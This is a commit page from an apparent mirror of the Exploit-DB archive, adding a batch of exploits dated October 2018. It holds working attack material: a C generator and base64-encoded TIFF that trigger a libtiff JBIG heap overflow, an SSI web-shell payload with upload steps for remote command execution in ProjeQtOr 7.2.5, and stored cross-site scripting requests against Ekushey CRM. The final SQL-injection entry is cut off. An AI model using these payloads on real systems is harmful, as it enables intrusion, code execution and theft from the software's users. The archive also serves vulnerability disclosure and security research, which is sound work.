bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-26

Browse source 
21 changes to exploits/shellcodes

ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
BORGChat 1.0.0 build 438 - Denial of Service (PoC)

libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer
Adult Filter 1.0 - Buffer Overflow (SEH)
WebEx - Local Service Permissions Exploit (Metasploit)

exim 4.90 - Remote Code Execution
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write
exim 4.90 - Remote Code Execution
WebExec - Authenticated User Code Execution (Metasploit)

ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
Ekushey Project Manager CRM 3.1 - Cross-Site Scripting
phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
phptpoint Hospital Management System 1.0 - 'user' SQL injection
Simple Chat System 1.0 - 'id' SQL Injection
Delta Sql 1.8.2 - Arbitrary File Upload
User Management 1.1 - Cross-Site Scripting
ClipBucket 2.8 - 'id' SQL Injection
Simple POS and Inventory 1.0 - 'cat' SQL Injection
AiOPMSD Final 1.0.0 - 'q' SQL Injection
AjentiCP 1.2.23.13 - Cross-Site Scripting
MPS Box 0.1.8.0 - 'uuid' SQL Injection
Open STA Manager 2.3 - Arbitrary File Download
This commit is contained in:
Offensive Security 2018-10-26 05:01:46 +00:00
parent dac8dd4731
commit 832a222df4
20 changed files with 1651 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

301
exploits/linux/dos/45694.c Normal file
View file

@ -0,0 +1,301 @@
/*
libtiff up to and including 4.0.9 decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size.
The issue occurs because JBIGDecode entirely ignores the size of the buffer that is passed to it:
static int JBIGDecode(TIFF* tif, uint8* buffer, tmsize_t size, uint16 s)
{
struct jbg_dec_state decoder;
int decodeStatus = 0;
unsigned char* pImage = NULL;
(void) size, (void) s;
if (isFillOrder(tif, tif->tif_dir.td_fillorder))
{
TIFFReverseBits(tif->tif_rawdata, tif->tif_rawdatasize);
}
jbg_dec_init(&decoder);
(...)
decodeStatus = jbg_dec_in(&decoder, (unsigned char*)tif->tif_rawdata,
(size_t)tif->tif_rawdatasize, NULL);
if (JBG_EOK != decodeStatus)
{
(...)
}
pImage = jbg_dec_getimage(&decoder, 0);
_TIFFmemcpy(buffer, pImage, jbg_dec_getsize(&decoder));
jbg_dec_free(&decoder);
return 1;
}
The 4th line above is apparently to silence compiler warnings; the code proceeds to decode the JBIG contents, and then blindly copies as many bytes as decoded into the target buffer by means of _TIFFmemcpy.
The attack primitive here ends up as follows:
1) The attacker gets to perform an allocation of a size of his choosing.
2) The attacker gets to write a pretty arbitrary amount of data of his choosing into this buffer.
Reproducing testcases can be generated using the following C code:
=============================================================================
*/
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdint.h>
#include "jbig.h"
void output_bie(unsigned char *start, size_t len, void *file)
{
fwrite(start, 1, len, (FILE *) file);
return;
}
int main(int argc, char**argv)
{
FILE* inputfile = fopen(argv[1], "rb");
FILE* outputfile = fopen(argv[2], "wb");
// Write the hacky TIF header.
unsigned char buf[] = {
0x49, 0x49, // Identifier.
0x2A, 0x00, // Version.
0xCA, 0x03, 0x00, 0x00, // First IFD offset.
0x32, 0x30, 0x30, 0x31,
0x3a, 0x31, 0x31, 0x3a,
0x32, 0x37, 0x20, 0x32,
0x31, 0x3a, 0x34, 0x30,
0x3a, 0x32, 0x38, 0x00,
0x38, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00,
0x38, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00
};
fwrite(&(buf[0]), sizeof(buf), 1, outputfile);
// Read the inputfile.
struct stat st;
stat(argv[1], &st);
size_t size = st.st_size;
unsigned char* data = malloc(size);
fread(data, size, 1, inputfile);
// Calculate how many "pixels" we have in the input.
unsigned char *bitmaps[1] = { data };
struct jbg_enc_state se;
jbg_enc_init(&se, size * 8, 1, 1, bitmaps, output_bie, outputfile);
jbg_enc_out(&se);
jbg_enc_free(&se);
// The raw JBIG data has been written, now write the IFDs for the TIF file.
unsigned char ifds[] = {
0x0E, 0x00, // Number of entries. +0
0xFE, 0x00, // Subfile type. +2
0x04, 0x00, // Datatype: LONG. +6
0x01, 0x00, 0x00, 0x00, // 1 element. +10
0x00, 0x00, 0x00, 0x00, // 0 +14
0x00, 0x01, // IMAGE_WIDTH +16
0x03, 0x00, // Datatype: SHORT. +18
0x01, 0x00, 0x00, 0x00, // 1 element. +22
0x96, 0x00, 0x00, 0x00, // 96 hex width. +26
0x01, 0x01, // IMAGE_LENGTH +28
0x03, 0x00, // SHORT +30
0x01, 0x00, 0x00, 0x00, // 1 element +34
0x96, 0x00, 0x00, 0x00, // 96 hex length. +38
0x02, 0x01, // BITS_PER_SAMPLE +40
0x03, 0x00, // SHORT +42
0x01, 0x00, 0x00, 0x00, // 1 element +46
0x01, 0x00, 0x00, 0x00, // 1 +50
0x03, 0x01, // COMPRESSION +52
0x03, 0x00, // SHORT +54
0x01, 0x00, 0x00, 0x00, // 1 element +58
0x65, 0x87, 0x00, 0x00, // JBIG +62
0x06, 0x01, // PHOTOMETRIC +64
0x03, 0x00, // SHORT +66
0x01, 0x00, 0x00, 0x00, // 1 element +70
0x00, 0x00, 0x00, 0x00, // / +74
0x11, 0x01, // STRIP_OFFSETS +78
0x04, 0x00, // LONG +80
0x13, 0x00, 0x00, 0x00, // 0x13 elements +82
0x2C, 0x00, 0x00, 0x00, // Offset 2C in file +86
0x15, 0x01, // SAMPLES_PER_PIXEL +90
0x03, 0x00, // SHORT +92
0x01, 0x00, 0x00, 0x00, // 1 element +94
0x01, 0x00, 0x00, 0x00, // 1 +98
0x16, 0x01, // ROWS_PER_STRIP +102
0x04, 0x00, // LONG +104
0x01, 0x00, 0x00, 0x00, // 1 element +106
0xFF, 0xFF, 0xFF, 0xFF, // Invalid +110
0x17, 0x01, // STRIP_BYTE_COUNTS +114
0x04, 0x00, // LONG +116
0x13, 0x00, 0x00, 0x00, // 0x13 elements +118
0xC5, 0xC0, 0x00, 0x00, // Read 0xC0C5 bytes for the strip? +122
0x1A, 0x01, // X_RESOLUTION
0x05, 0x00, // RATIONAL
0x01, 0x00, 0x00, 0x00, // 1 element
0x1C, 0x00, 0x00, 0x00,
0x1B, 0x01, // Y_RESOLUTION
0x05, 0x00, // RATIONAL
0x01, 0x00, 0x00, 0x00, // 1 Element
0x24, 0x00, 0x00, 0x00,
0x28, 0x01, // RESOLUTION_UNIT
0x03, 0x00, // SHORT
0x01, 0x00, 0x00, 0x00, // 1 Element
0x02, 0x00, 0x00, 0x00, // 2
0x0A, 0x01, // FILL_ORDER
0x03, 0x00, // SHORT
0x01, 0x00, 0x00, 0x00, // 1 Element
0x02, 0x00, 0x00, 0x00, // Bit order inverted.
0x00, 0x00, 0x00, 0x00 };
// Adjust the offset for the IFDs.
uint32_t ifd_offset = ftell(outputfile);
fwrite(&(ifds[0]), sizeof(ifds), 1, outputfile);
fseek(outputfile, 4, SEEK_SET);
fwrite(&ifd_offset, sizeof(ifd_offset), 1, outputfile);
// Adjust the strip size properly.
fseek(outputfile, ifd_offset + 118, SEEK_SET);
fwrite(&ifd_offset, sizeof(ifd_offset), 1, outputfile);
fclose(outputfile);
fclose(inputfile);
return 0;
}
/*
===============================================================
Build & link with -ljbig.
You can then create a new TIFF file that corrupts the heap by doing
./a.out file_with_data_to_clobber_the_heap_with.txt outputfile.tiff
An example TIFF file that crashes various tiff readers is base64-encoded
below:
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
AAAAAAAA
Labels:
Vendor-libtiff
Product-libtiff
Severity-High
Methodology-source-review (e.g. Methodology-source-review)
Finder-thomasdullien
Reported-2018-Oct-13
*/

89
exploits/php/webapps/45680.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
# Date: 2018-10-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download
# Version: v7.2.5
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which
# leads to a remote command execution on the remote server.
# 1) Create a file with the below HTML code and save it as .shtml
<html>
<script>
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME
-->?"+document.getElementById('komut').value;
}
</script>
<!--#exec cmd=$output -->
</html>
# 2) Login to ProjeQtOr portal as priviliage user
# 3) You can perform this operation in the ckeditor fields.
# 4) Click (Image) button on Content panel.
# 5) Chose Upload section and browse your .shtml file.
# 6) Click "Send it to Server". Script will give you "This file is not a valid image." error.
# But it will send the file to the server. Just we need to find the file.
# 7) We can read how the uploaded files are named in the
# "/tool/uploadImage.php" file.(line 90)
<?php
$fileName=date('YmdHis').'_'.getSessionUser()->id.'_'.$uploadedFile['name'];
?>
# 8) The name of our file should be;
Y = Years, numeric, at least 2 digits with leading 0
m = Months, numeric
d = Days, numeric
H = Hours, numeric, at least 2 digits with leading 0
i = Minutes, numeric
s = Seconds, numeric
# We must save the date and time of the upload moment.
Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name
# For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30
# the file name will be "20181023010230_1_RCE.shtml"
# 9) Finaly all uploaded images are sent under the "/files/images/" folder.
# 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami
The request:
POST
/tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/view/main.php
Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n;
PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------1783728277808111921873701375
Content-Length: 550
-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
Content-Type: text/html
[shtml file content]
-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="ckCsrfToken"
7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n
-----------------------------1783728277808111921873701375--
HTTP/1.1 200 OK
Date: Mon, 23 Oct 2018 01:02:30 GMT

76
exploits/php/webapps/45681.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: Ekushey Project Manager CRM 3.1 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://creativeitem.com/
# Software Link : http://creativeitem.com/demo/ekushey/
# Software : Ekushey Project Manager CRM
# Version : 3.1
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18417
# In the 3.1 version of Ekushey Project Manager CRM, Stored XSS has been discovered in the input and upload
# sections, as demonstrated by the name parameter to the index.php/admin/client/create URI.
# HTTP POST Request :
POST /demo/ekushey/index.php/admin/client/create HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/demo/ekushey/index.php/admin/client
Content-Type: multipart/form-data; boundary=---------------------------19725691145690149721005243204
Content-Length: 1576033
Cookie: ci_session=bvug3n8aq64rpuft843qq986fhl077vq
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="name"
"><script>alert("ismailtasdelen")</script>
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="email"
test@ismailtasdelen.me
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="password"
Passw0rd
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="address"
"><script>alert("ismailtasdelen")</script>
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="phone"
+100200300205
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="website"
https://ismailtasdelen.me
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="skype_id"
ismailtasdelen
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="facebook_profile_link"
ismailtasdelen
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="linkedin_profile_link"
ismailtasdelen
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="twitter_profile_link"
ismailtasdelen
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="short_note"
"><script>alert("ismailtasdelen")</script>
-----------------------------19725691145690149721005243204
Content-Disposition: form-data; name="userfile"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg

42
exploits/php/webapps/45682.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
# Date: 2018-10-24
